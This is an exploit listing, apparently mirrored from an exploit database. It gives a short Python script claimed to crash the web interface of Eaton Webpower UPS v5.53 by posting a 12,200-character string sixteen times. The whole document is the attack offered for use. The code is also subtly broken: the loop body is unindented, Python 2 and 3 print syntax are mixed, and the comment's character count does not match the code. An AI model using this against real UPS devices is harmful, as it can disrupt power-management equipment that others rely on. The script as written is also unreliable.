Share
## https://sploitus.com/exploit?id=PACKETSTORM:173284
# Exploit Title: Webpower UPS v5.53 HTTP Denial of Service  
# Date: 2023-03-09  
# Exploit Author: Yehia Elghaly  
# Vendor Homepage: https://www.eaton.com/ae/en-gb.html  
# Software Link: https://www.eaton.com/ae/en-gb.html  
# Version: Revision v5.53  
# Tested on: WebPower UPS  
# CVE: N/A  
#!/usr/bin/env python  
# Webpower UPS v5.53 HTTP Denial of Service.  
# Discovered BY (Yehia Elghaly)  
import requests  
  
url = 'IP_Address'  
data = {'Long_string' : 'a' * 12200}# 19700-character pattern  
  
for i in range (16):  
response = requests.post(url, data=data)  
print("Response {}: {}".format(i+1, response.status_code))  
print "crach"